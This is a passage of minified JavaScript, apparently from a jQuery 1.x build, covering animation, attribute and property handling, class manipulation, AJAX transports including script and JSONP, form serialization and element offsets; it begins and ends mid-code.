i,r,o={},s=0;if(re.isArray(t)){for(i=et(e),r=t.length;r>s;s++)o[t[s]]=re.css(e,t[s],!1,i);return o}return void 0!==n?re.style(e,t,n):re.css(e,t)},e,t,arguments.length>1)},show:function(){return k(this,!0)},hide:function(){return k(this)},toggle:function(e){return"boolean"==typeof e?e?this.show():this.hide():this.each(function(){ke(this)?re(this).show():re(this).hide()})}}),re.Tween=N,N.prototype={constructor:N,init:function(e,t,n,i,r,o){this.elem=e,this.prop=n,this.easing=r||"swing",this.options=t,this.start=this.now=this.cur(),this.end=i,this.unit=o||(re.cssNumber[n]?"":"px")},cur:function(){var e=N.propHooks[this.prop];return e&&e.get?e.get(this):N.propHooks._default.get(this)},run:function(e){var t,n=N.propHooks[this.prop];return this.options.duration?this.pos=t=re.easing[this.easing](e,this.options.duration*e,0,1,this.options.duration):this.pos=t=e,this.now=(this.end-this.start)*t+this.start,this.options.step&&this.options.step.call(this.elem,this.now,this),n&&n.set?n.set(this):N.propHooks._default.set(this),this}},N.prototype.init.prototype=N.prototype,N.propHooks={_default:{get:function(e){var t;return null==e.elem[e.prop]||e.elem.style&&null!=e.elem.style[e.prop]?(t=re.css(e.elem,e.prop,""),t&&"auto"!==t?t:0):e.elem[e.prop]},set:function(e){re.fx.step[e.prop]?re.fx.step[e.prop](e):e.elem.style&&(null!=e.elem.style[re.cssProps[e.prop]]||re.cssHooks[e.prop])?re.style(e.elem,e.prop,e.now+e.unit):e.elem[e.prop]=e.now}}},N.propHooks.scrollTop=N.propHooks.scrollLeft={set:function(e){e.elem.nodeType&&e.elem.parentNode&&(e.elem[e.prop]=e.now)}},re.easing={linear:function(e){return e},swing:function(e){return.5-Math.cos(e*Math.PI)/2}},re.fx=N.prototype.init,re.fx.step={};var ft,ht,mt=/^(?:toggle|show|hide)$/,gt=new RegExp("^(?:([+-])=|)("+Ce+")([a-z%]*)$","i"),At=/queueHooks$/,vt=[D],yt={"*":[function(e,t){var n=this.createTween(e,t),i=n.cur(),r=gt.exec(t),o=r&&r[3]||(re.cssNumber[e]?"":"px"),s=(re.cssNumber[e]||"px"!==o&&+i)&&gt.exec(re.css(n.elem,e)),a=1,l=20;if(s&&s[3]!==o){o=o||s[3],r=r||[],s=+i||1;do a=a||".5",s/=a,re.style(n.elem,e,s+o);while(a!==(a=n.cur()/i)&&1!==a&&--l)}return r&&(s=n.start=+s||+i||0,n.unit=o,n.end=r[1]?s+(r[1]+1)*r[2]:+r[2]),n}]};re.Animation=re.extend(I,{tweener:function(e,t){re.isFunction(e)?(t=e,e=["*"]):e=e.split(" ");for(var n,i=0,r=e.length;r>i;i++)n=e[i],yt[n]=yt[n]||[],yt[n].unshift(t)},prefilter:function(e,t){t?vt.unshift(e):vt.push(e)}}),re.speed=function(e,t,n){var i=e&&"object"==typeof e?re.extend({},e):{complete:n||!n&&t||re.isFunction(e)&&e,duration:e,easing:n&&t||t&&!re.isFunction(t)&&t};return i.duration=re.fx.off?0:"number"==typeof i.duration?i.duration:i.duration in re.fx.speeds?re.fx.speeds[i.duration]:re.fx.speeds._default,null!=i.queue&&i.queue!==!0||(i.queue="fx"),i.old=i.complete,i.complete=function(){re.isFunction(i.old)&&i.old.call(this),i.queue&&re.dequeue(this,i.queue)},i},re.fn.extend({fadeTo:function(e,t,n,i){return this.filter(ke).css("opacity",0).show().end().animate({opacity:t},e,n,i)},animate:function(e,t,n,i){var r=re.isEmptyObject(e),o=re.speed(t,n,i),s=function(){var t=I(this,re.extend({},e),o);(r||re._data(this,"finish"))&&t.stop(!0)};return s.finish=s,r||o.queue===!1?this.each(s):this.queue(o.queue,s)},stop:function(e,t,n){var i=function(e){var t=e.stop;delete e.stop,t(n)};return"string"!=typeof e&&(n=t,t=e,e=void 0),t&&e!==!1&&this.queue(e||"fx",[]),this.each(function(){var t=!0,r=null!=e&&e+"queueHooks",o=re.timers,s=re._data(this);if(r)s[r]&&s[r].stop&&i(s[r]);else for(r in s)s[r]&&s[r].stop&&At.test(r)&&i(s[r]);for(r=o.length;r--;)o[r].elem!==this||null!=e&&o[r].queue!==e||(o[r].anim.stop(n),t=!1,o.splice(r,1));!t&&n||re.dequeue(this,e)})},finish:function(e){return e!==!1&&(e=e||"fx"),this.each(function(){var t,n=re._data(this),i=n[e+"queue"],r=n[e+"queueHooks"],o=re.timers,s=i?i.length:0;for(n.finish=!0,re.queue(this,e,[]),r&&r.stop&&r.stop.call(this,!0),t=o.length;t--;)o[t].elem===this&&o[t].queue===e&&(o[t].anim.stop(!0),o.splice(t,1));for(t=0;s>t;t++)i[t]&&i[t].finish&&i[t].finish.call(this);delete n.finish})}}),re.each(["toggle","show","hide"],function(e,t){var n=re.fn[t];re.fn[t]=function(e,i,r){return null==e||"boolean"==typeof e?n.apply(this,arguments):this.animate(j(t,!0),e,i,r)}}),re.each({slideDown:j("show"),slideUp:j("hide"),slideToggle:j("toggle"),fadeIn:{opacity:"show"},fadeOut:{opacity:"hide"},fadeToggle:{opacity:"toggle"}},function(e,t){re.fn[e]=function(e,n,i){return this.animate(t,e,n,i)}}),re.timers=[],re.fx.tick=function(){var e,t=re.timers,n=0;for(ft=re.now();n<t.length;n++)e=t[n],e()||t[n]!==e||t.splice(n--,1);t.length||re.fx.stop(),ft=void 0},re.fx.timer=function(e){re.timers.push(e),e()?re.fx.start():re.timers.pop()},re.fx.interval=13,re.fx.start=function(){ht||(ht=setInterval(re.fx.tick,re.fx.interval))},re.fx.stop=function(){clearInterval(ht),ht=null},re.fx.speeds={slow:600,fast:200,_default:400},re.fn.delay=function(e,t){return e=re.fx?re.fx.speeds[e]||e:e,t=t||"fx",this.queue(t,function(t,n){var i=setTimeout(t,e);n.stop=function(){clearTimeout(i)}})},function(){var e,t,n,i,r;t=he.createElement("div"),t.setAttribute("className","t"),t.innerHTML=" <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",i=t.getElementsByTagName("a")[0],n=he.createElement("select"),r=n.appendChild(he.createElement("option")),e=t.getElementsByTagName("input")[0],i.style.cssText="top:1px",ne.getSetAttribute="t"!==t.className,ne.style=/top/.test(i.getAttribute("style")),ne.hrefNormalized="/a"===i.getAttribute("href"),ne.checkOn=!!e.value,ne.optSelected=r.selected,ne.enctype=!!he.createElement("form").enctype,n.disabled=!0,ne.optDisabled=!r.disabled,e=he.createElement("input"),e.setAttribute("value",""),ne.input=""===e.getAttribute("value"),e.value="t",e.setAttribute("type","radio"),ne.radioValue="t"===e.value}();var bt=/\r/g;re.fn.extend({val:function(e){var t,n,i,r=this[0];{if(arguments.length)return i=re.isFunction(e),this.each(function(n){var r;1===this.nodeType&&(r=i?e.call(this,n,re(this).val()):e,null==r?r="":"number"==typeof r?r+="":re.isArray(r)&&(r=re.map(r,function(e){return null==e?"":e+""})),t=re.valHooks[this.type]||re.valHooks[this.nodeName.toLowerCase()],t&&"set"in t&&void 0!==t.set(this,r,"value")||(this.value=r))});if(r)return t=re.valHooks[r.type]||re.valHooks[r.nodeName.toLowerCase()],t&&"get"in t&&void 0!==(n=t.get(r,"value"))?n:(n=r.value,"string"==typeof n?n.replace(bt,""):null==n?"":n)}}}),re.extend({valHooks:{option:{get:function(e){var t=re.find.attr(e,"value");return null!=t?t:re.trim(re.text(e))}},select:{get:function(e){for(var t,n,i=e.options,r=e.selectedIndex,o="select-one"===e.type||0>r,s=o?null:[],a=o?r+1:i.length,l=0>r?a:o?r:0;a>l;l++)if(n=i[l],(n.selected||l===r)&&(ne.optDisabled?!n.disabled:null===n.getAttribute("disabled"))&&(!n.parentNode.disabled||!re.nodeName(n.parentNode,"optgroup"))){if(t=re(n).val(),o)return t;s.push(t)}return s},set:function(e,t){for(var n,i,r=e.options,o=re.makeArray(t),s=r.length;s--;)if(i=r[s],re.inArray(re.valHooks.option.get(i),o)>=0)try{i.selected=n=!0}catch(a){i.scrollHeight}else i.selected=!1;return n||(e.selectedIndex=-1),r}}}}),re.each(["radio","checkbox"],function(){re.valHooks[this]={set:function(e,t){return re.isArray(t)?e.checked=re.inArray(re(e).val(),t)>=0:void 0}},ne.checkOn||(re.valHooks[this].get=function(e){return null===e.getAttribute("value")?"on":e.value})});var wt,_t,xt=re.expr.attrHandle,Tt=/^(?:checked|selected)$/i,Et=ne.getSetAttribute,Ct=ne.input;re.fn.extend({attr:function(e,t){return ze(this,re.attr,e,t,arguments.length>1)},removeAttr:function(e){return this.each(function(){re.removeAttr(this,e)})}}),re.extend({attr:function(e,t,n){var i,r,o=e.nodeType;if(e&&3!==o&&8!==o&&2!==o)return typeof e.getAttribute===xe?re.prop(e,t,n):(1===o&&re.isXMLDoc(e)||(t=t.toLowerCase(),i=re.attrHooks[t]||(re.expr.match.bool.test(t)?_t:wt)),void 0===n?i&&"get"in i&&null!==(r=i.get(e,t))?r:(r=re.find.attr(e,t),null==r?void 0:r):null!==n?i&&"set"in i&&void 0!==(r=i.set(e,n,t))?r:(e.setAttribute(t,n+""),n):void re.removeAttr(e,t))},removeAttr:function(e,t){var n,i,r=0,o=t&&t.match(ye);if(o&&1===e.nodeType)for(;n=o[r++];)i=re.propFix[n]||n,re.expr.match.bool.test(n)?Ct&&Et||!Tt.test(n)?e[i]=!1:e[re.camelCase("default-"+n)]=e[i]=!1:re.attr(e,n,""),e.removeAttribute(Et?n:i)},attrHooks:{type:{set:function(e,t){if(!ne.radioValue&&"radio"===t&&re.nodeName(e,"input")){var n=e.value;return e.setAttribute("type",t),n&&(e.value=n),t}}}}}),_t={set:function(e,t,n){return t===!1?re.removeAttr(e,n):Ct&&Et||!Tt.test(n)?e.setAttribute(!Et&&re.propFix[n]||n,n):e[re.camelCase("default-"+n)]=e[n]=!0,n}},re.each(re.expr.match.bool.source.match(/\w+/g),function(e,t){var n=xt[t]||re.find.attr;xt[t]=Ct&&Et||!Tt.test(t)?function(e,t,i){var r,o;return i||(o=xt[t],xt[t]=r,r=null!=n(e,t,i)?t.toLowerCase():null,xt[t]=o),r}:function(e,t,n){return n?void 0:e[re.camelCase("default-"+t)]?t.toLowerCase():null}}),Ct&&Et||(re.attrHooks.value={set:function(e,t,n){return re.nodeName(e,"input")?void(e.defaultValue=t):wt&&wt.set(e,t,n)}}),Et||(wt={set:function(e,t,n){var i=e.getAttributeNode(n);return i||e.setAttributeNode(i=e.ownerDocument.createAttribute(n)),i.value=t+="","value"===n||t===e.getAttribute(n)?t:void 0}},xt.id=xt.name=xt.coords=function(e,t,n){var i;return n?void 0:(i=e.getAttributeNode(t))&&""!==i.value?i.value:null},re.valHooks.button={get:function(e,t){var n=e.getAttributeNode(t);return n&&n.specified?n.value:void 0},set:wt.set},re.attrHooks.contenteditable={set:function(e,t,n){wt.set(e,""===t?!1:t,n)}},re.each(["width","height"],function(e,t){re.attrHooks[t]={set:function(e,n){return""===n?(e.setAttribute(t,"auto"),n):void 0}}})),ne.style||(re.attrHooks.style={get:function(e){return e.style.cssText||void 0},set:function(e,t){return e.style.cssText=t+""}});var Mt=/^(?:input|select|textarea|button|object)$/i,kt=/^(?:a|area)$/i;re.fn.extend({prop:function(e,t){return ze(this,re.prop,e,t,arguments.length>1)},removeProp:function(e){return e=re.propFix[e]||e,this.each(function(){try{this[e]=void 0,delete this[e]}catch(t){}})}}),re.extend({propFix:{"for":"htmlFor","class":"className"},prop:function(e,t,n){var i,r,o,s=e.nodeType;if(e&&3!==s&&8!==s&&2!==s)return o=1!==s||!re.isXMLDoc(e),o&&(t=re.propFix[t]||t,r=re.propHooks[t]),void 0!==n?r&&"set"in r&&void 0!==(i=r.set(e,n,t))?i:e[t]=n:r&&"get"in r&&null!==(i=r.get(e,t))?i:e[t]},propHooks:{tabIndex:{get:function(e){var t=re.find.attr(e,"tabindex");return t?parseInt(t,10):Mt.test(e.nodeName)||kt.test(e.nodeName)&&e.href?0:-1}}}}),ne.hrefNormalized||re.each(["href","src"],function(e,t){re.propHooks[t]={get:function(e){return e.getAttribute(t,4)}}}),ne.optSelected||(re.propHooks.selected={get:function(e){var t=e.parentNode;return t&&(t.selectedIndex,t.parentNode&&t.parentNode.selectedIndex),null}}),re.each(["tabIndex","readOnly","maxLength","cellSpacing","cellPadding","rowSpan","colSpan","useMap","frameBorder","contentEditable"],function(){re.propFix[this.toLowerCase()]=this}),ne.enctype||(re.propFix.enctype="encoding");var zt=/[\t\r\n\f]/g;re.fn.extend({addClass:function(e){var t,n,i,r,o,s,a=0,l=this.length,d="string"==typeof e&&e;if(re.isFunction(e))return this.each(function(t){re(this).addClass(e.call(this,t,this.className))});if(d)for(t=(e||"").match(ye)||[];l>a;a++)if(n=this[a],i=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(zt," "):" ")){for(o=0;r=t[o++];)i.indexOf(" "+r+" ")<0&&(i+=r+" ");s=re.trim(i),n.className!==s&&(n.className=s)}return this},removeClass:function(e){var t,n,i,r,o,s,a=0,l=this.length,d=0===arguments.length||"string"==typeof e&&e;if(re.isFunction(e))return this.each(function(t){re(this).removeClass(e.call(this,t,this.className))});if(d)for(t=(e||"").match(ye)||[];l>a;a++)if(n=this[a],i=1===n.nodeType&&(n.className?(" "+n.className+" ").replace(zt," "):"")){for(o=0;r=t[o++];)for(;i.indexOf(" "+r+" ")>=0;)i=i.replace(" "+r+" "," ");s=e?re.trim(i):"",n.className!==s&&(n.className=s)}return this},toggleClass:function(e,t){var n=typeof e;return"boolean"==typeof t&&"string"===n?t?this.addClass(e):this.removeClass(e):re.isFunction(e)?this.each(function(n){re(this).toggleClass(e.call(this,n,this.className,t),t)}):this.each(function(){if("string"===n)for(var t,i=0,r=re(this),o=e.match(ye)||[];t=o[i++];)r.hasClass(t)?r.removeClass(t):r.addClass(t);else n!==xe&&"boolean"!==n||(this.className&&re._data(this,"__className__",this.className),this.className=this.className||e===!1?"":re._data(this,"__className__")||"")})},hasClass:function(e){for(var t=" "+e+" ",n=0,i=this.length;i>n;n++)if(1===this[n].nodeType&&(" "+this[n].className+" ").replace(zt," ").indexOf(t)>=0)return!0;return!1}}),re.each("blur focus focusin focusout load resize scroll unload click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup error contextmenu".split(" "),function(e,t){re.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),re.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)},bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,i){return this.on(t,e,n,i)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,"**"):this.off(t,e||"**",n)}});var St=re.now(),Bt=/\?/,Nt=/(,)|(\[|{)|(}|])|"(?:[^"\\\r\n]|\\["\\\/bfnrt]|\\u[\da-fA-F]{4})*"\s*:?|true|false|null|-?(?!0\d)\d+(?:\.\d+|)(?:[eE][+-]?\d+|)/g;re.parseJSON=function(t){if(e.JSON&&e.JSON.parse)return e.JSON.parse(t+"");var n,i=null,r=re.trim(t+"");return r&&!re.trim(r.replace(Nt,function(e,t,r,o){return n&&t&&(i=0),0===i?e:(n=r||t,i+=!o-!r,"")}))?Function("return "+r)():re.error("Invalid JSON: "+t)},re.parseXML=function(t){var n,i;if(!t||"string"!=typeof t)return null;try{e.DOMParser?(i=new DOMParser,n=i.parseFromString(t,"text/xml")):(n=new ActiveXObject("Microsoft.XMLDOM"),n.async="false",n.loadXML(t))}catch(r){n=void 0}return n&&n.documentElement&&!n.getElementsByTagName("parsererror").length||re.error("Invalid XML: "+t),n};var Pt,jt,Rt=/#.*$/,Dt=/([?&])_=[^&]*/,Ft=/^(.*?):[ \t]*([^\r\n]*)\r?$/gm,It=/^(?:about|app|app-storage|.+-extension|file|res|widget):$/,Lt=/^(?:GET|HEAD)$/,Ht=/^\/\//,Ot=/^([\w.+-]+:)(?:\/\/(?:[^\/?#]*@|)([^\/?#:]*)(?::(\d+)|)|)/,Qt={},Wt={},qt="*/".concat("*");try{jt=location.href}catch(Ut){jt=he.createElement("a"),jt.href="",jt=jt.href}Pt=Ot.exec(jt.toLowerCase())||[],re.extend({active:0,lastModified:{},etag:{},ajaxSettings:{url:jt,type:"GET",isLocal:It.test(Pt[1]),global:!0,processData:!0,async:!0,contentType:"application/x-www-form-urlencoded; charset=UTF-8",accepts:{"*":qt,text:"text/plain",html:"text/html",xml:"application/xml, text/xml",json:"application/json, text/javascript"},contents:{xml:/xml/,html:/html/,json:/json/},responseFields:{xml:"responseXML",text:"responseText",json:"responseJSON"},converters:{"* text":String,"text html":!0,"text json":re.parseJSON,"text xml":re.parseXML},flatOptions:{url:!0,context:!0}},ajaxSetup:function(e,t){return t?O(O(e,re.ajaxSettings),t):O(re.ajaxSettings,e)},ajaxPrefilter:L(Qt),ajaxTransport:L(Wt),ajax:function(e,t){function n(e,t,n,i){var r,c,A,v,b,_=t;2!==y&&(y=2,a&&clearTimeout(a),d=void 0,s=i||"",w.readyState=e>0?4:0,r=e>=200&&300>e||304===e,n&&(v=Q(u,w,n)),v=W(u,v,w,r),r?(u.ifModified&&(b=w.getResponseHeader("Last-Modified"),b&&(re.lastModified[o]=b),b=w.getResponseHeader("etag"),b&&(re.etag[o]=b)),204===e||"HEAD"===u.type?_="nocontent":304===e?_="notmodified":(_=v.state,c=v.data,A=v.error,r=!A)):(A=_,!e&&_||(_="error",0>e&&(e=0))),w.status=e,w.statusText=(t||_)+"",r?h.resolveWith(p,[c,_,w]):h.rejectWith(p,[w,_,A]),w.statusCode(g),g=void 0,l&&f.trigger(r?"ajaxSuccess":"ajaxError",[w,u,r?c:A]),m.fireWith(p,[w,_]),l&&(f.trigger("ajaxComplete",[w,u]),--re.active||re.event.trigger("ajaxStop")))}"object"==typeof e&&(t=e,e=void 0),t=t||{};var i,r,o,s,a,l,d,c,u=re.ajaxSetup({},t),p=u.context||u,f=u.context&&(p.nodeType||p.jquery)?re(p):re.event,h=re.Deferred(),m=re.Callbacks("once memory"),g=u.statusCode||{},A={},v={},y=0,b="canceled",w={readyState:0,getResponseHeader:function(e){var t;if(2===y){if(!c)for(c={};t=Ft.exec(s);)c[t[1].toLowerCase()]=t[2];t=c[e.toLowerCase()]}return null==t?null:t},getAllResponseHeaders:function(){return 2===y?s:null},setRequestHeader:function(e,t){var n=e.toLowerCase();return y||(e=v[n]=v[n]||e,A[e]=t),this},overrideMimeType:function(e){return y||(u.mimeType=e),this},statusCode:function(e){var t;if(e)if(2>y)for(t in e)g[t]=[g[t],e[t]];else w.always(e[w.status]);return this},abort:function(e){var t=e||b;return d&&d.abort(t),n(0,t),this}};if(h.promise(w).complete=m.add,w.success=w.done,w.error=w.fail,u.url=((e||u.url||jt)+"").replace(Rt,"").replace(Ht,Pt[1]+"//"),u.type=t.method||t.type||u.method||u.type,u.dataTypes=re.trim(u.dataType||"*").toLowerCase().match(ye)||[""],null==u.crossDomain&&(i=Ot.exec(u.url.toLowerCase()),u.crossDomain=!(!i||i[1]===Pt[1]&&i[2]===Pt[2]&&(i[3]||("http:"===i[1]?"80":"443"))===(Pt[3]||("http:"===Pt[1]?"80":"443")))),u.data&&u.processData&&"string"!=typeof u.data&&(u.data=re.param(u.data,u.traditional)),H(Qt,u,t,w),2===y)return w;l=u.global,l&&0===re.active++&&re.event.trigger("ajaxStart"),u.type=u.type.toUpperCase(),u.hasContent=!Lt.test(u.type),o=u.url,u.hasContent||(u.data&&(o=u.url+=(Bt.test(o)?"&":"?")+u.data,delete u.data),u.cache===!1&&(u.url=Dt.test(o)?o.replace(Dt,"$1_="+St++):o+(Bt.test(o)?"&":"?")+"_="+St++)),u.ifModified&&(re.lastModified[o]&&w.setRequestHeader("If-Modified-Since",re.lastModified[o]),re.etag[o]&&w.setRequestHeader("If-None-Match",re.etag[o])),(u.data&&u.hasContent&&u.contentType!==!1||t.contentType)&&w.setRequestHeader("Content-Type",u.contentType),w.setRequestHeader("Accept",u.dataTypes[0]&&u.accepts[u.dataTypes[0]]?u.accepts[u.dataTypes[0]]+("*"!==u.dataTypes[0]?", "+qt+"; q=0.01":""):u.accepts["*"]);for(r in u.headers)w.setRequestHeader(r,u.headers[r]);if(u.beforeSend&&(u.beforeSend.call(p,w,u)===!1||2===y))return w.abort();b="abort";for(r in{success:1,error:1,complete:1})w[r](u[r]);if(d=H(Wt,u,t,w)){w.readyState=1,l&&f.trigger("ajaxSend",[w,u]),u.async&&u.timeout>0&&(a=setTimeout(function(){w.abort("timeout")},u.timeout));try{y=1,d.send(A,n)}catch(_){if(!(2>y))throw _;n(-1,_)}}else n(-1,"No Transport");return w},getJSON:function(e,t,n){return re.get(e,t,n,"json")},getScript:function(e,t){return re.get(e,void 0,t,"script")}}),re.each(["get","post"],function(e,t){re[t]=function(e,n,i,r){return re.isFunction(n)&&(r=r||i,i=n,n=void 0),re.ajax({url:e,type:t,dataType:r,data:n,success:i})}}),re.each(["ajaxStart","ajaxStop","ajaxComplete","ajaxError","ajaxSuccess","ajaxSend"],function(e,t){re.fn[t]=function(e){return this.on(t,e)}}),re._evalUrl=function(e){return re.ajax({url:e,type:"GET",dataType:"script",async:!1,global:!1,"throws":!0})},re.fn.extend({wrapAll:function(e){if(re.isFunction(e))return this.each(function(t){re(this).wrapAll(e.call(this,t))});if(this[0]){var t=re(e,this[0].ownerDocument).eq(0).clone(!0);this[0].parentNode&&t.insertBefore(this[0]),t.map(function(){for(var e=this;e.firstChild&&1===e.firstChild.nodeType;)e=e.firstChild;return e}).append(this)}return this},wrapInner:function(e){return re.isFunction(e)?this.each(function(t){re(this).wrapInner(e.call(this,t))}):this.each(function(){var t=re(this),n=t.contents();n.length?n.wrapAll(e):t.append(e)})},wrap:function(e){var t=re.isFunction(e);return this.each(function(n){re(this).wrapAll(t?e.call(this,n):e)})},unwrap:function(){return this.parent().each(function(){re.nodeName(this,"body")||re(this).replaceWith(this.childNodes)}).end()}}),re.expr.filters.hidden=function(e){return e.offsetWidth<=0&&e.offsetHeight<=0||!ne.reliableHiddenOffsets()&&"none"===(e.style&&e.style.display||re.css(e,"display"))},re.expr.filters.visible=function(e){return!re.expr.filters.hidden(e)};var Vt=/%20/g,Gt=/\[\]$/,$t=/\r?\n/g,Yt=/^(?:submit|button|image|reset|file)$/i,Zt=/^(?:input|select|textarea|keygen)/i;re.param=function(e,t){var n,i=[],r=function(e,t){t=re.isFunction(t)?t():null==t?"":t,i[i.length]=encodeURIComponent(e)+"="+encodeURIComponent(t)};if(void 0===t&&(t=re.ajaxSettings&&re.ajaxSettings.traditional),re.isArray(e)||e.jquery&&!re.isPlainObject(e))re.each(e,function(){r(this.name,this.value)});else for(n in e)q(n,e[n],t,r);return i.join("&").replace(Vt,"+")},re.fn.extend({serialize:function(){return re.param(this.serializeArray())},serializeArray:function(){return this.map(function(){var e=re.prop(this,"elements");return e?re.makeArray(e):this}).filter(function(){var e=this.type;return this.name&&!re(this).is(":disabled")&&Zt.test(this.nodeName)&&!Yt.test(e)&&(this.checked||!Se.test(e))}).map(function(e,t){var n=re(this).val();return null==n?null:re.isArray(n)?re.map(n,function(e){return{name:t.name,value:e.replace($t,"\r\n")}}):{name:t.name,value:n.replace($t,"\r\n")}}).get()}}),re.ajaxSettings.xhr=void 0!==e.ActiveXObject?function(){return!this.isLocal&&/^(get|post|head|put|delete|options)$/i.test(this.type)&&U()||V()}:U;var Jt=0,Xt={},Kt=re.ajaxSettings.xhr();e.ActiveXObject&&re(e).on("unload",function(){for(var e in Xt)Xt[e](void 0,!0)}),ne.cors=!!Kt&&"withCredentials"in Kt,Kt=ne.ajax=!!Kt,Kt&&re.ajaxTransport(function(e){if(!e.crossDomain||ne.cors){var t;return{send:function(n,i){var r,o=e.xhr(),s=++Jt;if(o.open(e.type,e.url,e.async,e.username,e.password),e.xhrFields)for(r in e.xhrFields)o[r]=e.xhrFields[r];e.mimeType&&o.overrideMimeType&&o.overrideMimeType(e.mimeType),e.crossDomain||n["X-Requested-With"]||(n["X-Requested-With"]="XMLHttpRequest");for(r in n)void 0!==n[r]&&o.setRequestHeader(r,n[r]+"");o.send(e.hasContent&&e.data||null),t=function(n,r){var a,l,d;if(t&&(r||4===o.readyState))if(delete Xt[s],t=void 0,o.onreadystatechange=re.noop,r)4!==o.readyState&&o.abort();else{d={},a=o.status,"string"==typeof o.responseText&&(d.text=o.responseText);try{l=o.statusText}catch(c){l=""}a||!e.isLocal||e.crossDomain?1223===a&&(a=204):a=d.text?200:404}d&&i(a,l,d,o.getAllResponseHeaders())},e.async?4===o.readyState?setTimeout(t):o.onreadystatechange=Xt[s]=t:t()},abort:function(){t&&t(void 0,!0)}}}}),re.ajaxSetup({accepts:{script:"text/javascript, application/javascript, application/ecmascript, application/x-ecmascript"},contents:{script:/(?:java|ecma)script/},converters:{"text script":function(e){return re.globalEval(e),e}}}),re.ajaxPrefilter("script",function(e){void 0===e.cache&&(e.cache=!1),e.crossDomain&&(e.type="GET",e.global=!1)}),re.ajaxTransport("script",function(e){if(e.crossDomain){var t,n=he.head||re("head")[0]||he.documentElement;return{send:function(i,r){t=he.createElement("script"),t.async=!0,e.scriptCharset&&(t.charset=e.scriptCharset),t.src=e.url,t.onload=t.onreadystatechange=function(e,n){(n||!t.readyState||/loaded|complete/.test(t.readyState))&&(t.onload=t.onreadystatechange=null,t.parentNode&&t.parentNode.removeChild(t),t=null,n||r(200,"success"))},n.insertBefore(t,n.firstChild)},abort:function(){t&&t.onload(void 0,!0)}}}});var en=[],tn=/(=)\?(?=&|$)|\?\?/;re.ajaxSetup({jsonp:"callback",jsonpCallback:function(){var e=en.pop()||re.expando+"_"+St++;return this[e]=!0,e}}),re.ajaxPrefilter("json jsonp",function(t,n,i){var r,o,s,a=t.jsonp!==!1&&(tn.test(t.url)?"url":"string"==typeof t.data&&!(t.contentType||"").indexOf("application/x-www-form-urlencoded")&&tn.test(t.data)&&"data");return a||"jsonp"===t.dataTypes[0]?(r=t.jsonpCallback=re.isFunction(t.jsonpCallback)?t.jsonpCallback():t.jsonpCallback,a?t[a]=t[a].replace(tn,"$1"+r):t.jsonp!==!1&&(t.url+=(Bt.test(t.url)?"&":"?")+t.jsonp+"="+r),t.converters["script json"]=function(){return s||re.error(r+" was not called"),s[0]},t.dataTypes[0]="json",o=e[r],e[r]=function(){s=arguments},i.always(function(){e[r]=o,t[r]&&(t.jsonpCallback=n.jsonpCallback,en.push(r)),s&&re.isFunction(o)&&o(s[0]),s=o=void 0}),"script"):void 0}),re.parseHTML=function(e,t,n){if(!e||"string"!=typeof e)return null;"boolean"==typeof t&&(n=t,t=!1),t=t||he;var i=ue.exec(e),r=!n&&[];return i?[t.createElement(i[1])]:(i=re.buildFragment([e],t,r),r&&r.length&&re(r).remove(),re.merge([],i.childNodes))};var nn=re.fn.load;re.fn.load=function(e,t,n){if("string"!=typeof e&&nn)return nn.apply(this,arguments);var i,r,o,s=this,a=e.indexOf(" ");return a>=0&&(i=re.trim(e.slice(a,e.length)),e=e.slice(0,a)),re.isFunction(t)?(n=t,t=void 0):t&&"object"==typeof t&&(o="POST"),s.length>0&&re.ajax({url:e,type:o,dataType:"html",data:t}).done(function(e){r=arguments,s.html(i?re("<div>").append(re.parseHTML(e)).find(i):e)}).complete(n&&function(e,t){s.each(n,r||[e.responseText,t,e])}),this},re.expr.filters.animated=function(e){return re.grep(re.timers,function(t){return e===t.elem}).length};var rn=e.document.documentElement;re.offset={setOffset:function(e,t,n){var i,r,o,s,a,l,d,c=re.css(e,"position"),u=re(e),p={};"static"===c&&(e.style.position="relative"),a=u.offset(),o=re.css(e,"top"),l=re.css(e,"left"),d=("absolute"===c||"fixed"===c)&&re.inArray("auto",[o,l])>-1,d?(i=u.position(),s=i.top,r=i.left):(s=parseFloat(o)||0,r=parseFloat(l)||0),re.isFunction(t)&&(t=t.call(e,n,a)),null!=t.top&&(p.top=t.top-a.top+s),null!=t.left&&(p.left=t.left-a.left+r),"using"in t?t.using.call(e,p):u.css(p)}},re.fn.extend({offset:function(e){if(arguments.length)return void 0===e?this:this.each(function(t){re.offset.setOffset(this,e,t)});var t,n,i={top:0,left:0},r=this[0],o=r&&r.ownerDocument;if(o)return t=o.documentElement,re.contains(t,r)?(typeof r.getBoundingClientRect!==xe&&(i=r.getBoundingClientRect()),n=G(o),{top:i.top+(n.pageYOffset||t.scrollTop)-(t.clientTop||0),left:i.left+(n.pageXOffset||t.scrollLeft)-(t.clientLeft||0)}):i},position:function(){if(this[0]){var e,t,n={top:0,left:0},i=this[0];return"fixed"===re.css(i,"position")?t=i.getBoundingClientRect():(e=this.offsetParent(),t=this.offset(),re.nodeName(e[0],"html")||(n=e.offset()),n.top+=re.css(e[0],"borderTopWidth",!0),n.left+=re.css(e[0],"borderLeftWidth",!0)),{top:t.top-n.top-re.css(i,"marginTop",!0),left:t.left-n.left-re.css(i,"marginLeft",!0)}}},offsetParent:function(){return this.map(function(){for(var e=this.offsetParent||rn;e&&!re.nodeName(e,"html")&&"static"===re.css(e,"position");)e=e.offsetParent;return e||rn})}}),re.each({scrollLeft:"pageXOffset",scrollTop:"pageYOffset"},function(e,t){var n=/Y/.test(t);re.fn[e]=function(i){return ze(this,function(e,i,r){var o=G(e);return void 0===r?o?t in o?o[t]:o.document.documentElement[i]:e[i]:void(o?o.scrollTo(n?re(o).scrollLeft():r,n?r:re(o).scrollTop()):e[i]=r)},e,i,arguments.length,null)}}),re.each(["top","left"],function(e,t){re.cssHooks[t]=C(ne.pixelPosition,function(e,n){return n?(n=tt(e,t),it.test(n)?re(e).position()[t]+"px":n):void 0})}),re.each({Height:"height",Width:"width"},function(e,t){re.each({padding:"inner"+e,content:t,"":"outer"+e},function(n,i){re.fn[i]=function(i,r){var o=arguments.length&&(n||"boolean"!=typeof i),s=n||(i===!0||r===!0?"margin":"border");return ze(this,function(t,n,i){var 